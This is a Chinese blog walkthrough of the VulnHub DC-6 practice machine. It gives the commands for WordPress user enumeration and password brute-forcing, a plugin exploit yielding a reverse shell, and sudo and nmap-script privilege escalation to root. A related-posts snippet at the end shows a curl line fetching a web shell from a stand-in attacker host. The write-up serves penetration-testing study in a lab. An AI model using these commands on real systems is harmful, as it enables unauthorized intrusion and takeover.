DC-6靶场实战

已于 2024-03-26 16:22:07 修改
阅读量1k 收藏 16
点赞数 8
文章标签: 安全
于 2024-03-26 16:08:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42754807/article/details/137044587
版权

前言

  这次的靶机是vulnhub下的第6台靶机,下载地址为DC: 6 ~ VulnHub,同样的,下载解压后,用VMware打开

这次的靶机在下载界面给我们提供了线索,这边提示我们需要将kali上的rockyou.txt中包含k01的密码提取出来,相比于暴力破解可以节省几年的时间。

一.准备工作

  设置靶机的网络适配器为nat模式

输入命令,可以得知靶机对应的IP地址为192.168.188.135

arp-scan -l

继续输入以下命令

nmap -A -sV -p- --min-parallelism 100 192.168.188.135 

可以得知,靶机开放了22端口和80端口,这边还有一个提示符

Did not follow redirect to http://wordy/

这边提示我们直接输入靶机的IP地址是无法跳转到网址页面的,因此,我们需要在hosts文件中设置域名wordy到靶机IP的地址映射,输入以下命令

vim etc/hosts

192.168.188.135 wordy

vim编辑需要按O进入编辑模式,编辑完成后输入CTRL+c退出编辑模式,然后输入:wq,保存并退出

注意:如果是在windows系统的浏览器上修改hosts文件,则需要进入对应的目录中

输入靶机的ip地址到浏览器中,会自动跳转到对应的域名,并且也可以知道网址使用的是wordpress搭建的

二.wordpress爆破

输入以下命令进行爆破

wpscan --url wordy -e u
枚举出所有用户名

可以看出,爆破出了5个用户名admin,sarah,graham,mark,jens,将这五个用户名保存到user.txt中,此时想到了先前作者给出的提示,通过kali自带的字典进行暴力破解 

输入以下命令

cat /usr/share/wordlists/rockyou.txt|grep k01 > ps.txt

grep表示管道命令

>表示保存到ps.txt这个文件中

此时用户名和密码都拥有了,进行暴力破解

输入以下命令

wpscan --url wordy -U user.txt -P ps.txt

成功破解出一个账户和密码,此时登录网站后台(由于网站是wordpress搭建的,默认后台就是wp-login.php,就不用dirsearch了),输入账号和密码

三.获取shell

  登录账号后,发现并没有什么存在数据交互的地方,但是这里有个Activity monitor模块,这个模块在我之前有使用过这个模块的漏洞

输入以下命令查询这个模块的漏洞

searchsploit Activoty monitor

发现这里存在两个可以用于wordpress的漏洞,这里我们试试第一个,将其下载下来

searchsploit -m 45274.html

cat 45274.html

发现这是个表单提交的按钮,根据需要,将其更改为自己提交的数据,修改后保存并退出

注意修改的ip地址为kali的本地ip地址

然后在本地开启一个监听接口,打开45274.html

rlwrap nc -lvnp 4443

点击提交后,发现已经获得了一个交互式的shell

升级成交互式的shell,输入以下命令

python -c 'import pty;pty.spawn("/bin/bash")'

四.提权

 此时已经有了一个可以交互的shell,现在要做的一步就是提权,先试下suid提权,输入以下命令

find / -perm -u=s -type f -exec ls -la {} \; 2>/dev/null

suid提权可以参考这篇博客Linux下利用SUID提权-腾讯云开发者社区-腾讯云

 

发现并没有可以提权的文件,试一下sudo提权,发现也不行

没有办法了,只能到家目录里面去找找看有没有些有用的信息

发现在mark里面有一个things-to-do.txt文件,打开看看

这边爆出了graham的密码,我们用ssh登录试试看

成功登陆上去了,试试能否用suid提权,发现还是没有可以提权的相关命令,试试sudo提权

发现可以,可以通过jens这个用户执行backups.sh这个脚本实现提权

把/bin/bash追加到这个文件,然后用jens的身份执行这个文件的时候就会打开一个具有jens权限的shell

输入以下命令

cd /home/jens

echo '/bin/bash' >>backups.sh

sudo -u jens ./backups.sh

>>表示追加

发现此时已经切换到了jens用户,并且没有通过密码进行验证,看看是否能通过sudo进行提权

发现可以通过执行nmap可以获得一个root身份,现在还不知道nmap如何使用,查资料得知nmap扫描可以通过nmap脚本进行提权

因此我们可以创建一个nse脚本,输入以下命令

echo 'os.execute("/bin/sh")'>kali.nse

sudo nmap --script=kali.nse

发现已经成功

五.总结

 这次也是收获到了很多的知识,不会的东西不知道怎么用先别急,可以先查查资料,GPT,文心一言都有很多的解释,最大的收获就是遇到问题不要怕,多查查资料,总有解决的手段。

tp1679
关注
  • 8
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机实战-DC-6
滕财然的博客
03-03 801
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
DC6靶场
m0_62438849的博客
03-19 1927
信息收集ip地址为192.168.146.144端口扫描、服务器版本探测开放了22端口和80端口去网站访问一下,一直访问不出来,想到上次那个靶机修改/etc/hosts文件访问http://wordy用的cms是wordpress5.1.1wordy说它相当于是另一个wordpress网站,提供安全的插件隐藏目录扫描。
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
rumil的博客
04-20 1000
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
DC6-靶机渗透
banacyo14206的博客
08-22 544
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
DC6-靶机
Au
10-30 1659
下载地址 下面是作者的提示,和爆破的字典有关 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 配置的环境: kali:192.168.25.131 DC6-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/...
DC-6靶机
Flamingo1998的博客
02-23 195
DC-6靶机
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
vuInhub靶场实战系列-DC-7实战
05-30
vuInhub靶场实战系列-DC-7实战
vulnhub之DC6靶机
LainWith的博客
02-14 537
目录介绍信息收集主机发现主机信息探测访问网站wpscan测试站点登录站点反弹shell信息收集提权 介绍 系列: DC(此系列共10台) 发布日期:2019 年 4 月 26 日 难度:初级-中级 Flag:获取root权限,并拿到唯一的flag 学习: ● wordpress 安全测试 ● 本地代码执行 ● nmap 提权 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 提示信息: 靶机支持Virtualbox和Vmware 需要修改hosts文件,如:192.
Dc-6靶机实验
weixin_52263461的博客
03-17 402
靶机DC-6下载地址: https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 虚拟机软件 DC-6靶机IP地址:192.168.62.136 Kali的IP地址:192.168.62.135 使用nmap工具扫描192.168.62.0网段的存活主机,发现DC-6靶机的IP地址为192.168.62.136 使用nmap扫描靶机开放的端口,已开放端口有22(ssh)、80(http) 浏览器地址栏输入靶机IP地址,发现显示域名但无法
渗透测试:DC-6靶机
Ciyaso的博客
08-21 288
一、扫描获取靶机ip arp-scan -l 192.168.203.145 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.145 开放了22、80端口 访问主页,发现访问不了,和DC-2一样存在重定向,需要修改hosts文件 成功访问 2.Wappaloyzer CMS:WordPress 操作系统:Debian 数据库:Mysql Web服务器:Apache 2.4.25 3.wpscan 由于使用的是WordPress,所以我们使用wpsacn进行扫描
DC靶机系列:DC-6
Ays.Ie的博客
02-28 577
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC6靶机训练
E1even的博客
09-06 256
kali:192.168.78.131 DC-6:192.168.78.140 ifconfig nmap -sP 192.168.78.0/24 nmap -p 1-65535 -A -sV 192.168.78.140 访问80端口,查看框架 眼熟的WordPress,扫描域名,寻找我们需要的登录框 find / -name "dirseach*" 2> /dev/null (查询dirseach模块在哪里 python3 dirsearch.py -u url -e php 找到我们需
渗透测试学习之靶机DC-6
xdbzdgx的博客
11-28 5543
1.下载靶机 本篇文章是DC靶机系列的第6篇,针对的是靶机DC-6,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-6的下载地址为DC: 6 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-6只有一个flag。 在VMware加载成功之后并开启,建议把DC-6靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 1910
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值